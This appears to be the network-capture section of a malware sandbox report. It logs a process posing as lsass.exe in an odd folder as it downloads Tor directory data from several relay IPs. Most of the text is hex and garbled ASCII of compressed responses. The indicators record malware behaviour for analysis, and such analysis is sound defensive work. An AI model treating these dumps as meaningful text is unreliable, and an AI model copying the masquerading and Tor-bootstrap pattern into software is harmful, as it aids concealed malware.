Jan 10, 2024 15:38:33.104935884 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:38:32 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49726	193.11.164.243	9030	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:39:00.161336899 CET	147	OUT	GET /tor/status-vote/current/consensus.z HTTP/1.1 Accept-Encoding: gzip Host: 193.11.164.243:9030 Connection: Close Cache-Control: no-cache
Jan 10, 2024 15:39:00.375082016 CET	1286	IN	HTTP/1.0 200 OK Date: Wed, 10 Jan 2024 14:39:00 GMT Content-Type: text/plain X-Your-Address-Is: 102.165.48.42 Content-Encoding: deflate Expires: Wed, 10 Jan 2024 15:00:00 GMT Vary: X-Or-Diff-From-Consensus Data Raw: 78 da ec fd 69 73 a3 c8 b6 05 0c 7f 3f bf 82 ef ea b2 48 48 26 c5 73 9e 78 98 34 cf 68 7e e3 44 07 33 08 04 88 41 08 fd fa 37 13 bb aa 6c 6c 75 57 77 9f be d7 a5 db 15 65 59 b6 06 8b 4d b2 73 0f 6b af 15 d9 79 19 a7 c1 97 2c d7 f3 22 fb 72 b1 d3 cc 8f 23 82 fe d7 25 ce ed 97 df 12 66 1c 65 76 94 15 d9 bf be dd fb 72 b2 73 2f b6 08 1a 3d 53 0f 7d eb 8b ee e4 76 4a 50 24 05 bf 90 e0 0b 20 09 00 3b 24 89 fe ff cb 49 ed cc fb 52 44 b9 1f be 79 9c 79 79 fc f9 f5 ef 1f e7 be 3e 1e e7 7e e4 7e b1 ec 50 af 08 9a 24 f1 d7 bf cc d0 b7 a3 fc eb e7 cd 08 f2 09 3e 71 4f dc 2f cf df f9 97 ef 80 fc 7a 07 7c bd 43 7d bd 43 7f bd 03 bf de 61 be de 61 eb 3b fc 13 f8 a2 87 89 a7 bf fc 44 bd f9 89 fe 92 9a 2f 77 e1 cb 77 e6 e5 fb d7 97 73 2f df f9 97 ef c2 d7 b7 25 ff 95 d9 29 fa e8 3f ed c7 0f a2 b8 8c be 38 a1 ee 66 84 58 a0 85 90 fa 79 45 48 ba a5 5e fd 9c a8 6f ba 7a 96 13 bd 42 4f 2d a2 af 29 7e 4a 4c 7c cb 0a ed 59 14 56 c4 34 56 2d f9 eb 4a 22 96 45 14 a1 13 4c 68 b9 6e 84 36 fe 16 da 8a 9d 99 84 56 19 68 49 6c 28 fc ea 0d 5e 24 ff 4a 6d 33 3e 9d ec c8 b2 ad 2f 2f 2b 20 49 e3 3c 36 e3 30 23 f0 3b fe 9b 22 f0 4b f1 37 3f 95 75 d3 b3 d1 dd fa ef d7 df 07 51 9e c6 ff 86 e8 de 12 bd 09 fa d5 d8 8f 82 7f c3 2f 0c fa 74 66 1a 5b cf 2f 5d e2 95 f6 6f ea cd 5f 4b f1 ef fe 5b 7f 0c df c1 66 fb 37 7d e7 ef 9e 0b 3f fd fd 43 7c 7e bf df 7e 8b ff c9 cf 9d e8 a9 7e 7a 5e 10 e8 bd 26 fa 55 ab 57 79 36 b7 53 d1 b2 d2 7f f3 84 ec a7 66 e1 e7 f3 d4 af 57 4c 5f 0f 9d d0 77 ec 49 66 9b ff 46 57 35 ba b6 95 58 7b 79 92 9c da 7a 8e 2e 0e a9 48 b3 fc df ec 47 0f a9 11 5e 31 d6 bf c1 07 8f 4d fc 08 1d 6b 64 9b f8 87 fa 90 df 3d 65 a9 e7 f6 cb 03 df 9e f9 f6 2d bf fd 1a 1d 0c fa c1 2c d2 14 9d 10 39 46 ce ea df 4c fd 89 96 b6 53 64 b6 86 d6 6f 68 f7 e3 44 ae cf 18 b6 9b 7d bb c4 45 86 de 47 bd e6 e8 47 a9 52 2d 8a 61 80 30 50 d0 ef 46 03 6d a5 21 bb 5b 68 ed 23 73 23 33 e9 21 32 ea b4 38 4d 57 71 6d b0 95 38 ff 37 40 f6 58 67 f6 2c c9 fd 93 9f e5 be a9 e8 b9 8e 5e 6d 94 3a 32 71 e2 5b f5 fd cc d4 d1 a7 4c 7f 35 4d f4 a3 69 e4 b9 9d e5 c8 e5 9e d1 cb 09 d3 fc 55 0f 5d 74 8c e8 8e 59 46 d6 af 4e 11 86 bf ba 7a 82 4e ef 9b 5f 9d fc 28 31 f3 7f 53 cc b7 5f fb 51 fd 7e df 7f fa 35 c5 e6 a2 bf ff 0e bd e6 df 80 aa df 28 43 1f 22 f9 d5 46 d7 3d 3a 51 e4 f7 df c4 11 b2 dd bf 21 57 bf ed c5 76 f5 ec d7 da 09 3d 3f 15 f0 ec f7 df 1b 76 ae bf 3c 9f e6 a8 ef bf 47 6e 3f 7f 79 3e fd 7c 44 af 7f ff f2 07 68 f8 fd 01 57 3f 9d be 3e 40 41 9e 30 9d eb af 61 5c d6 6f f1 6b ee e1 cd 28 0e 2d 74 fa f0 07 45 0b e2 d7 93 7e fd d5 b4 91 11 ce 85 5d d8 bf 66 fe cd 46 c7 c5 dc 7f f4 d7 b8 c8 f1 c9 21 09 2b ce 7e 8d 8a d3 af df 9e 89 1e 39 ff 9b 21 5c ec f7 be 44 e8 ba f3 4f 7a 5a 7d b1 fc f4 4b fd bb ec 4b 1e 7f 41 0b 06 9d 92 e6 73 9a 8f 7b d9 af 78 97 f0 4d bb 7e e7 d4 ba fc ea e8 7e 58 a0 03 40 27 c6 cb d0 7b fe 9a 25 68 29 5b bf 66 79 9c da e8 94 c6 e8 6a 0b 63 f4 8b fa e8 b3 c0 8f 7e 8d d0 43 bf 26 36 ba e0 d0 d3 6c 13 bd 94 e4 d1 07 bf f7 4c 74 d6 42 1b 3f df b4 eb 25 4e 12 c8 49 5b 27 fb 57 fb 84 ac 87 ce f8 af 2f 5b d6 bf c1 bf 32 4f af 3d 8c 1e 59 e8 20 ec 8b 1f e3 00 42 0f 0b 9b e0 88 bc 9d 70 b9 7d 1c f6 38 6b 61 fa 07 f2 b0 1f 2d 4b 36 5f 8e af 5d c9 4f 1c 8b a1 b8 64 99 d0 92 7e 0d fe fd e6 9d 5e ae b1 Data Ascii: xis?HH&sx4h~D3A7lluWweYMsky,"r#%fevrs/=S}vJP$ ;$IRDyyy>~~P$>qO/z\|C}Caa;D/wws/%)?8fXyEH^ozBO-)~JL\|YV4V-J"ELhn6VhIl(^$Jm3>//+ I<60#;"K7?uQ/tf[/]o_K[f7}?C\|~~~z^&UWy6SfWL_wIfFW5X{yz.HG^1Mkd=e-,9FLSdohD}EGGR-a0PFm![h#s#3!28MWqm87@Xg,^m:2q[L5MiU]tYFNzN_(1S_Q~5(C"F=:Q!Wv=?v<Gn?y>\|DhW?>@A0a\ok(-tE~]fF!+~9!\DOzZ}KKAs{xM~~X@'{%h)[fyjc~C&6lLtB?%NI['W/[2O=Y Bp}8ka-K6_]Od~^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49728	199.58.81.140	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:39:15.320205927 CET	777	OUT	GET /tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z HTTP/1.1 Accept-Encoding: gzip Host: 199.58.81.140 Connection: Close Cache-Control: no-cache
Jan 10, 2024 15:39:15.428867102 CET	1286	IN	HTTP/1.0 200 OK Date: Wed, 10 Jan 2024 14:39:15 GMT Content-Type: text/plain X-Your-Address-Is: 102.165.48.42 Content-Encoding: deflate Pragma: no-cache Data Raw: 38 cb 94 55 57 93 ab 48 b2 7e e7 57 f0 30 4f a3 55 ab 80 c2 9d 88 8e b8 85 93 47 16 21 b4 b1 0f 78 21 e1 8d 30 bf fe 56 77 ef cc a1 67 4f ac 51 b7 50 66 56 92 95 f9 65 d6 57 65 d6 d4 7e 49 d6 59 f9 c8 dc a7 1f 93 14 14 df 58 ee 0d c2 37 c8 93 10 32 24 20 01 11 79 7e 5a 47 75 3f f5 3d 9a 65 29 91 98 7e 7c 24 75 be d4 49 55 f9 34 91 b2 7a 3c 7f 9a 09 74 38 20 69 c8 2e c8 db e4 eb 65 9d 19 57 9b cb f4 4c da 3d bd 67 a7 6c fc 3c 5b dd d4 13 75 06 d6 23 86 35 1c e4 62 9e a2 03 0a 25 24 eb 37 ed 71 27 a8 ce b5 b6 db c9 09 95 4b 5d df 2f e5 be 00 97 cd a9 85 c2 e6 50 97 3c 7f d0 5f 40 d3 f5 07 ef f6 0c bb 12 5e ed 26 da dd d2 f5 cd 04 cf 6e dd a4 6b 9d 70 e0 61 8d 12 78 bb 27 c6 b9 45 43 65 1a 66 31 30 aa 0a 96 33 93 bd eb c9 ec 6a 5b b9 c5 b9 fb c3 59 2c d6 a0 d8 9a f7 d7 b9 69 6f a7 83 f1 fe 55 9b aa 2b bf a8 2c b1 2b 8c d6 f4 e9 ff 89 04 f9 30 8f 16 f4 dc eb 5c 51 f6 cf 70 dd 2b e7 73 8f aa a2 d6 4e a0 da ed 65 b0 b1 27 13 a0 38 a2 74 3e 10 79 6c d7 41 56 26 e4 39 2b 49 f0 06 df 84 37 0a 90 59 4a 6e a2 b4 e9 88 bc cc ea 8c 94 b3 34 88 9b ee 9d fa 90 aa 77 6a 4a 93 8a 5f b9 5f 42 54 ca b6 7b f7 df 69 52 8b b3 56 ae cb f8 d3 be 38 e1 95 f7 8f df 65 5a 97 d9 3b 9c b2 58 3e fa a9 f7 b9 8c c3 3f b1 c0 7e 0a a8 a9 ef ef d4 df 18 72 1b b9 65 e6 fd 11 7a 6f 7b 5e 94 86 38 c8 d1 8f ed 1e db 20 91 37 4e 1c 55 77 df 23 69 40 c3 29 a0 a6 38 5d 00 7e d0 d4 0f 00 89 00 bb fb 65 5e 46 69 4d 02 8d 83 24 02 1c 4d aa aa 24 90 9c 2c 6b a4 42 e3 e9 11 a0 40 93 1c 23 2b 24 27 4a 3c 09 04 49 26 55 01 b0 44 93 d7 51 e2 93 18 44 1a 42 8a 70 ec d4 6b 23 af be 93 14 e0 19 1e 52 02 0d bf 8b 50 84 b4 c0 10 7e 57 97 f6 34 4a 83 6c ea 45 a1 5f d5 24 c7 21 5a a2 29 99 97 28 55 e6 11 ad 29 8c 04 90 c4 a9 9c 40 23 4a a3 15 c0 41 41 d6 64 b2 68 e8 a1 9a 08 9b 85 b6 cc 62 eb da 1f 8d 95 66 d0 97 f8 90 d8 cd 91 72 5c 7f 07 35 84 9e b2 9e 40 22 4b a3 2c fd 68 f4 78 d4 8f 27 44 ee 0d 69 b3 94 c9 b5 6a 7d 8d c4 76 39 5f a1 6c 2e 21 9d ae fc 8d 37 ef 75 f7 46 f3 77 f3 be 64 d7 ee 62 72 dc 01 fe 51 4d 56 61 a3 a3 49 09 ad 52 70 ce 20 65 94 08 e6 f7 0b c5 cf 05 22 84 46 f3 3c d9 3e 73 71 9e 66 6c bd a2 bd 59 e4 aa 55 ce 36 bc 91 16 da 4d ab c3 70 af 5b 5c c0 88 9c fd 60 ee 8a c5 de 67 af db 69 7d 1b ee 7d c1 ab c4 20 ad b2 49 4e 0b db 02 79 02 3d 98 6d b5 c8 56 be cd 57 e5 b6 33 1f aa fb 08 07 6f 41 ed 57 7a 7b d4 f6 f3 12 24 8d 26 a2 70 2b 21 a4 8e 86 fd 57 b5 55 51 98 e2 26 ff 6f 30 3c b2 50 63 16 9c 53 5d dc 15 3e 13 f3 f4 ec 31 07 68 d3 d2 f2 c4 1a 83 1f a8 e6 62 36 cb 2b c6 e8 25 fd de 81 a5 a4 ad 65 eb 4a 5c 25 4b 58 5f fc 7d ff 92 e9 4b a8 23 fd ee 00 7f 5d 5e 7a e9 26 6b d6 5a 91 03 ba a8 61 2d da fe 89 3a ee af 69 b5 c9 82 c9 61 76 bc f2 46 db 55 02 4b cc c4 e1 e0 14 a7 e0 8a f6 95 b3 88 f3 3b 2f 3c b7 5d f0 34 e1 7c 55 1c 6c f7 c8 e8 e6 a2 7b 76 ec 3e 2e 79 ef b1 32 b2 fd e2 bf 83 e1 cf 59 98 e2 03 53 55 ae 5f d6 63 38 e4 e3 ee 74 fa c9 11 ed 2b 62 1d d4 cc 5d db 94 f7 7d 8e 2c e5 34 8f 2f 54 b2 b2 cf a8 db f2 c1 4e b9 b4 43 49 f9 35 a7 9f 26 4c a2 32 69 63 b5 13 38 a9 66 b5 52 2e ca 90 98 73 5d e5 43 2d d1 65 47 0c 76 1c e6 17 a5 78 20 76 df 3c 58 cf f5 6e e7 9a 43 76 66 50 e7 cb 86 52 bc 94 ee ad 84 95 8b 6b a5 84 37 36 f7 67 08 b3 75 a4 95 05 5d 28 37 1b 4d f2 e8 11 ab d6 b2 a7 5f 06 14 23 f3 7e bd 27 87 f2 b5 9b e9 97 d9 5d a1 84 51 e5 7f 29 23 c5 57 c2 f4 17 95 e3 db e0 3f 90 7f 86 c9 bf 97 90 45 3d cd dd e2 aa 75 61 3b b0 4b b9 0a 01 10 c2 cd Data Ascii: 8UWH~W0OUG!x!0VwgOQPfVeWe~IYX72$ y~ZGu?=e)~\|$uIU4z<t8 i.eWL=gl<[u#5b%$7q'K]/P<_@^&nkpax'ECef103j[Y,ioU+,+0\Qp+sNe'8t>ylAV&9+I7YJn4wjJ__BT{iRV8eZ;X>?~rezo{^8 7NUw#i@)8]~e^FiM$M$,kB@#+$'J<I&UDQDBpk#RP~W4JlE_$!Z)(U)@#JAAdhbfr\5@"K,hx'Dij}v9_l.!7uFwdbrQMVaIRp e"F<>sqflYU6Mp[\`gi}} INy=mVW3oAWz{$&p+!WUQ&o0<PcS]>1hb6+%eJ\%KX_}K#]^z&kZa-:iavFUK;/<]4\|Ul{v>.y2YSU_c8t+b]},4/TNCI5&L2ic8fR.s]C-eGvx v<XnCvfPRk76gu](7M_#~']Q)#W?E=ua;K
Jan 10, 2024 15:39:15.428913116 CET	714	IN	Data Raw: ba 3c 1a f5 46 79 b4 b5 4c bf 5e 35 a2 67 07 03 20 65 9f 2d 4e bc 7f ed ec 82 c8 3c 3a 2d 5f 7c e8 2b 74 c5 df 64 69 55 28 4d 10 e8 a7 7c 06 d8 93 77 b4 e2 a7 69 cf cc b5 9e bc 76 da 8b 97 c2 8e 72 85 b4 bd 8b ca fd 7a 98 04 9b 17 f1 aa c3 a6 7c Data Ascii: <FyL^5g e-N<:-_\|+tdiU(M\|wivrz\|-f:[2G_"lRn[G>;{pcCBJQ..R2oNn6\V'6$Jo&o4?7/EuU`roA[m45RHfG
Jan 10, 2024 15:39:15.429019928 CET	1286	IN	Data Raw: 5d d8 6f 6a 6b c6 3c 9e 8b e8 bc e0 93 be 9a dc e7 c6 65 72 d9 b7 eb 7d ab df 0e 6a e9 10 0f 07 50 f9 83 9e 83 3a 56 93 c5 b0 9b 08 da 04 2e 51 99 f4 90 cf b5 c4 ba 01 d9 ea bd 84 df 6b 60 74 d7 fd a5 8c af 8a c9 53 86 81 f6 71 d9 34 be 1b 84 37 Data Ascii: ]ojk<er}jP:V.Qk`tSq47o`H<H@DQ12Y=ICem-z9i.8^.brVBywr=FIg`<tAQz)-&'Y!b+xnZ+Kw^Z
Jan 10, 2024 15:39:15.429102898 CET	1286	IN	Data Raw: d0 db 07 bb 7d 90 db 07 b7 7d 50 1b f9 1b 27 8a 1c cb a8 ac a2 01 11 4a 2c 8e ca d2 3c ab 09 08 6a 38 34 e2 65 56 52 58 95 d6 c8 df 54 9c 14 cf b1 a2 aa 69 94 ac 89 3c 4f 49 2c e2 19 95 12 55 09 93 19 0f 10 85 77 61 01 71 8f 3c cf 4f a7 95 5f be Data Ascii: }}P'J,<j84eVRXTi<OI,Uwaq<O_"Wn[UoJ3QJ?HKkI6M^-oJ,8u&4>RL/?H'}RN}/f{\d_IA
Jan 10, 2024 15:39:15.429203033 CET	1286	IN	Data Raw: b9 e8 f8 30 1b 06 24 9b 3c 5b f9 c0 8e f8 a5 58 68 09 57 f5 1a c0 97 59 91 16 22 15 e7 c7 7c bf 09 4e 25 18 9d b3 d7 46 d2 e9 79 76 cd a7 f3 56 b3 bf a3 bd 46 b7 8e 1f fa 01 ef ab 3e 5e fd 7b 6d f8 a5 85 0f b3 29 65 19 25 45 f5 7b 3b 9c d1 60 3c Data Ascii: 0$<[XhWY"\|N%FyvVF>^{m)e%E{;`<v}m5UNvO(>63_d=w.Vlk6m8ys7Lo;bc8lEq6.U{=-\o<$JCYR
Jan 10, 2024 15:39:15.429276943 CET	1286	IN	Data Raw: 8e c8 ff 3b 12 44 88 a0 b4 96 3c aa 22 fc 48 b3 4d 6e 48 b2 4d ca ca 22 c4 83 5a d9 ae 04 5c 52 aa 5d ea d9 06 7d 8e e2 14 ba 82 4a 1b 12 ad 24 23 ca 6a 5c eb 65 b5 ed a8 5e 8f 8c f1 90 b1 d3 d8 21 cf 69 e1 b2 d7 ad e5 0c 36 9d d9 bd e3 3b d5 3a Data Ascii: ;D<"HMnHM"Z\R]}J$#j\e^!i6;:^/.o7;2oh8~elgQoj Y<-,=fy>, Ens\|0{u"-;nooGcyVI-Fscl)7?n{
Jan 10, 2024 15:39:15.429373026 CET	1286	IN	Data Raw: 5d a4 3c 6d 7d 31 93 f0 b4 b4 b5 ed 99 74 3c 8f 73 b3 41 98 12 c8 a4 51 04 b1 91 66 18 68 ce cc 8c 6c 2e b5 09 e3 99 c1 13 d7 b6 6d 08 30 43 42 33 6a 0b 9b 31 ad 18 61 66 c4 d8 28 d9 f4 db ac 0b f4 24 c7 dc bc 70 90 10 66 e2 0e 66 26 3d e3 df 35 Data Ascii: ]<m}1t<sAQfhl.m0CB3j1af($pff&=5I0AMuL1p0-ar(3rM4%SR verG2iPC?lq+POWOWyH$;iWv$@fD'aT)4^I@
Jan 10, 2024 15:39:15.429464102 CET	1286	IN	Data Raw: d6 ce bd 0c 5e 24 26 4b ca c2 83 55 70 6c 7b 2e 2f 40 fc ec 72 52 9e b2 7e d4 eb ba aa 62 1d d3 64 b9 48 25 7f 1c c6 b6 a2 ee 9d f7 bb 8e ef cb 21 b9 fa b9 de dd 3b d5 da 1d f6 b7 3e f2 0f c7 41 89 5c 73 37 ec 77 93 21 bd 84 a6 3c 59 9c 1f c1 f2 Data Ascii: ^$&KUpl{./@rR~bdH%!;>A\s7w!<YqSle1O3w'j0?lS:mdQjQzp]ju'sE{-Kilt8L}~2}_edGgn<^`i3&"/QD}'uo
Jan 10, 2024 15:39:15.429548025 CET	1286	IN	Data Raw: 1b 99 ff 91 46 5c 24 59 fb 6f 32 67 f1 bf 93 fe 04 a4 bf d2 d5 ed e3 21 7a b2 d0 a7 82 31 96 e6 e9 a9 f5 98 1c 27 38 dc 5f d3 6c e1 38 c4 ef 9e 1d 1b 69 c9 26 22 58 ed 66 93 cd f5 a1 f1 e9 f1 9d a1 89 90 57 42 14 84 86 58 1e 7c bc 1f 4b a7 e0 6e Data Ascii: F\$Yo2g!z1'8_l8i&"XfWBX\|KnnP%\|bG`(u\|pLZlg01x6\R?jZjUZjEC@J!#J$CuB(X Dx#k"%]KdDxFPT&u]UEQ
Jan 10, 2024 15:39:15.429630041 CET	1286	IN	Data Raw: ed 27 f3 8d 96 2f 4e 8b 49 1c da ea 18 7a 4e 7f 1c 27 dd 9d 77 df 0c aa b8 13 e7 a8 2c b4 49 a2 29 b3 31 5d 1a 4c e1 5a 69 c9 0f 0e bb b5 b6 3d 96 7d 8b 5e e8 0d 9c d6 bd 49 b8 e3 b3 38 b8 6c cf b9 e8 3c a8 1f f7 ff 41 59 99 2c 39 8a 2c 6b 78 cf Data Ascii: '/NIzN'w,I)1]LZi=}^I8l<AY,9,kxSUd2OifQ `<[i[#?JlTABi3lqrhezJ<mr=!PtqrSo]>k;xtA..2$!@;HGi V>rZ
Jan 10, 2024 15:39:15.536860943 CET	1286	IN	Data Raw: 89 e4 18 0c ec e0 42 87 45 eb c6 f0 85 89 3c 5d b8 19 1c e5 7e 8f 3d 75 d4 a9 43 28 de 7c 24 e1 e2 4a 3a 42 f3 e5 8f b1 f6 55 e9 c6 95 05 cf 16 a7 2a 3c 78 14 ef df 15 a1 29 fb 03 5b ef 39 f6 d0 0f 19 c3 ed 30 1a db 9d e0 83 a9 b8 1d 24 3e f7 56 Data Ascii: BE<]~=uC(\|$J:BU*<x)[90$>V:G;%A:yY&q8u/ xrL3[Jad+U]\|a~[]B+e!Jczv~AwCD&~UKvj}]0'$0n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49739	86.59.21.38	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:39:35.354928017 CET	139	OUT	GET /tor/status-vote/current/consensus.z HTTP/1.1 Accept-Encoding: gzip Host: 86.59.21.38 Connection: Close Cache-Control: no-cache
Jan 10, 2024 15:39:38.619224072 CET	85	IN	HTTP/1.0 503 Directory busy, try again later Date: Wed, 10 Jan 2024 14:39:35 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49746	193.11.164.243	9030	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:40:27.212155104 CET	147	OUT	GET /tor/status-vote/current/consensus.z HTTP/1.1 Accept-Encoding: gzip Host: 193.11.164.243:9030 Connection: Close Cache-Control: no-cache
Jan 10, 2024 15:40:27.422684908 CET	1286	IN	HTTP/1.0 200 OK Date: Wed, 10 Jan 2024 14:40:27 GMT Content-Type: text/plain X-Your-Address-Is: 102.165.48.42 Content-Encoding: deflate Expires: Wed, 10 Jan 2024 15:00:00 GMT Vary: X-Or-Diff-From-Consensus Data Raw: 78 da ec fd 69 73 a3 c8 b6 05 0c 7f 3f bf 82 ef ea b2 48 48 26 c5 73 9e 78 98 34 cf 68 7e e3 44 07 33 08 04 88 41 08 fd fa 37 13 bb aa 6c 6c 75 57 77 9f be d7 a5 db 15 65 59 b6 06 8b 4d b2 73 0f 6b af 15 d9 79 19 a7 c1 97 2c d7 f3 22 fb 72 b1 d3 cc 8f 23 82 fe d7 25 ce ed 97 df 12 66 1c 65 76 94 15 d9 bf be dd fb 72 b2 73 2f b6 08 1a 3d 53 0f 7d eb 8b ee e4 76 4a 50 24 05 bf 90 e0 0b 20 09 00 3b 24 89 fe ff cb 49 ed cc fb 52 44 b9 1f be 79 9c 79 79 fc f9 f5 ef 1f e7 be 3e 1e e7 7e e4 7e b1 ec 50 af 08 9a 24 f1 d7 bf cc d0 b7 a3 fc eb e7 cd 08 f2 09 3e 71 4f dc 2f cf df f9 97 ef 80 fc 7a 07 7c bd 43 7d bd 43 7f bd 03 bf de 61 be de 61 eb 3b fc 13 f8 a2 87 89 a7 bf fc 44 bd f9 89 fe 92 9a 2f 77 e1 cb 77 e6 e5 fb d7 97 73 2f df f9 97 ef c2 d7 b7 25 ff 95 d9 29 fa e8 3f ed c7 0f a2 b8 8c be 38 a1 ee 66 84 58 a0 85 90 fa 79 45 48 ba a5 5e fd 9c a8 6f ba 7a 96 13 bd 42 4f 2d a2 af 29 7e 4a 4c 7c cb 0a ed 59 14 56 c4 34 56 2d f9 eb 4a 22 96 45 14 a1 13 4c 68 b9 6e 84 36 fe 16 da 8a 9d 99 84 56 19 68 49 6c 28 fc ea 0d 5e 24 ff 4a 6d 33 3e 9d ec c8 b2 ad 2f 2f 2b 20 49 e3 3c 36 e3 30 23 f0 3b fe 9b 22 f0 4b f1 37 3f 95 75 d3 b3 d1 dd fa ef d7 df 07 51 9e c6 ff 86 e8 de 12 bd 09 fa d5 d8 8f 82 7f c3 2f 0c fa 74 66 1a 5b cf 2f 5d e2 95 f6 6f ea cd 5f 4b f1 ef fe 5b 7f 0c df c1 66 fb 37 7d e7 ef 9e 0b 3f fd fd 43 7c 7e bf df 7e 8b ff c9 cf 9d e8 a9 7e 7a 5e 10 e8 bd 26 fa 55 ab 57 79 36 b7 53 d1 b2 d2 7f f3 84 ec a7 66 e1 e7 f3 d4 af 57 4c 5f 0f 9d d0 77 ec 49 66 9b ff 46 57 35 ba b6 95 58 7b 79 92 9c da 7a 8e 2e 0e a9 48 b3 fc df ec 47 0f a9 11 5e 31 d6 bf c1 07 8f 4d fc 08 1d 6b 64 9b f8 87 fa 90 df 3d 65 a9 e7 f6 cb 03 df 9e f9 f6 2d bf fd 1a 1d 0c fa c1 2c d2 14 9d 10 39 46 ce ea df 4c fd 89 96 b6 53 64 b6 86 d6 6f 68 f7 e3 44 ae cf 18 b6 9b 7d bb c4 45 86 de 47 bd e6 e8 47 a9 52 2d 8a 61 80 30 50 d0 ef 46 03 6d a5 21 bb 5b 68 ed 23 73 23 33 e9 21 32 ea b4 38 4d 57 71 6d b0 95 38 ff 37 40 f6 58 67 f6 2c c9 fd 93 9f e5 be a9 e8 b9 8e 5e 6d 94 3a 32 71 e2 5b f5 fd cc d4 d1 a7 4c 7f 35 4d f4 a3 69 e4 b9 9d e5 c8 e5 9e d1 cb 09 d3 fc 55 0f 5d 74 8c e8 8e 59 46 d6 af 4e 11 86 bf ba 7a 82 4e ef 9b 5f 9d fc 28 31 f3 7f 53 cc b7 5f fb 51 fd 7e df 7f fa 35 c5 e6 a2 bf ff 0e bd e6 df 80 aa df 28 43 1f 22 f9 d5 46 d7 3d 3a 51 e4 f7 df c4 11 b2 dd bf 21 57 bf ed c5 76 f5 ec d7 da 09 3d 3f 15 f0 ec f7 df 1b 76 ae bf 3c 9f e6 a8 ef bf 47 6e 3f 7f 79 3e fd 7c 44 af 7f ff f2 07 68 f8 fd 01 57 3f 9d be 3e 40 41 9e 30 9d eb af 61 5c d6 6f f1 6b ee e1 cd 28 0e 2d 74 fa f0 07 45 0b e2 d7 93 7e fd d5 b4 91 11 ce 85 5d d8 bf 66 fe cd 46 c7 c5 dc 7f f4 d7 b8 c8 f1 c9 21 09 2b ce 7e 8d 8a d3 af df 9e 89 1e 39 ff 